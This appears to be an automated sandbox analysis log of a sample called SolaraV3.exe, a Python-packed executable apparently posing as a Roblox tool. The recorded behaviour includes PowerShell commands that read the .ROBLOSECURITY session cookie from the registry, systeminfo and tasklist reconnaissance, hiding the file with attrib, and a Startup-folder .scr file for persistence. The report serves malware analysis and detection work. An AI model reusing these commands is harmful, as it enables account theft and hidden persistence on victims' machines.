              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\Desktop\pyvenv.cfgJump to behavior
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: SolaraV3.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: SolaraV3.exeStatic file information: File size 6315120 > 1048576
              Source: SolaraV3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: SolaraV3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: SolaraV3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: SolaraV3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: SolaraV3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: SolaraV3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: SolaraV3.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: SolaraV3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: SolaraV3.exe, 00000002.00000002.2054170176.00007FFB1E4C1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: SolaraV3.exe, 00000002.00000002.2046985205.00007FFB0B7FC000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SolaraV3.exe, 00000001.00000003.1559590237.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2053703446.00007FFB1C3C1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.1.dr
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2051655996.00007FFB0C5F1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2051929047.00007FFB18B71000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SolaraV3.exe
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: SolaraV3.exe, 00000002.00000002.2051343700.00007FFB0C5DB000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: SolaraV3.exe, 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python310.pdb source: SolaraV3.exe, 00000002.00000002.2049056875.00007FFB0BECF000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2053917460.00007FFB1E471000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: ;C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.pdb source: powershell.exe, 0000004A.00000002.1847941368.00000239E7D72000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: ;C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.pdbhP@ source: powershell.exe, 0000004A.00000002.1847941368.00000239E7D72000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: SolaraV3.exe, 00000002.00000002.2051343700.00007FFB0C5DB000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2053371221.00007FFB1C251000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: SolaraV3.exe, 00000002.00000002.2052555001.00007FFB1AB01000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: SolaraV3.exe, 00000002.00000002.2052925726.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000006E.00000000.1923151482.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmp, rar.exe, 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmp, rar.exe.1.dr
              Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2050619713.00007FFB0C411000.00000040.00000001.01000000.0000000E.sdmp
              Source: SolaraV3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: SolaraV3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: SolaraV3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: SolaraV3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: SolaraV3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0BB66EE0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FFB0BB66EE0
              Source: python310.dll.1.drStatic PE information: real checksum: 0x0 should be: 0x179482
              Source: unicodedata.pyd.1.drStatic PE information: real checksum: 0x0 should be: 0x4d519
              Source: libffi-7.dll.1.drStatic PE information: real checksum: 0x0 should be: 0x9bb1
              Source: _ctypes.pyd.1.drStatic PE information: real checksum: 0x0 should be: 0x15162
              Source: _bz2.pyd.1.drStatic PE information: real checksum: 0x0 should be: 0x190ae
              Source: sqlite3.dll.1.drStatic PE information: real checksum: 0x0 should be: 0xa7f83
              Source: libcrypto-1_1.dll.1.drStatic PE information: real checksum: 0x0 should be: 0x118790
              Source: libssl-1_1.dll.1.drStatic PE information: real checksum: 0x0 should be: 0x3bfea
              Source: SolaraV3.exeStatic PE information: real checksum: 0x60f6c0 should be: 0x6069ca
              Source: _queue.pyd.1.drStatic PE information: real checksum: 0x0 should be: 0xd20c
              Source: _socket.pyd.1.drStatic PE information: real checksum: 0x0 should be: 0x16097
              Source: _ssl.pyd.1.drStatic PE information: real checksum: 0x0 should be: 0x15afd
              Source: _hashlib.pyd.1.drStatic PE information: real checksum: 0x0 should be: 0x14a50
              Source: se3yji4z.dll.93.drStatic PE information: real checksum: 0x0 should be: 0xce6c
              Source: _decimal.pyd.1.drStatic PE information: real checksum: 0x0 should be: 0x241ea
              Source: select.pyd.1.drStatic PE information: real checksum: 0x0 should be: 0x927e
              Source: _lzma.pyd.1.drStatic PE information: real checksum: 0x0 should be: 0x2099b
              Source: _sqlite3.pyd.1.drStatic PE information: real checksum: 0x0 should be: 0x1931c
              Source: libffi-7.dll.1.drStatic PE information: section name: UPX2
              Source: VCRUNTIME140.dll.1.drStatic PE information: section name: _RDATA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAA935D2A5 pushad ; iretd 14_2_00007FFAA935D2A6
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: "C:\Users\user\Desktop\SolaraV3.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: attrib.exeJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: reg.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Users\user\Desktop\SolaraV3.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28842\libcrypto-1_1.dllJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28842\_queue.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.dllJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28842\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28842\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28842\sqlite3.dllJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28842\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28842\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28842\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28842\libffi-7.dllJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28842\libssl-1_1.dllJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28842\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28842\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28842\python310.dllJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scrJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scrJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC7076C0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,1_2_00007FF6DC7076C0
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
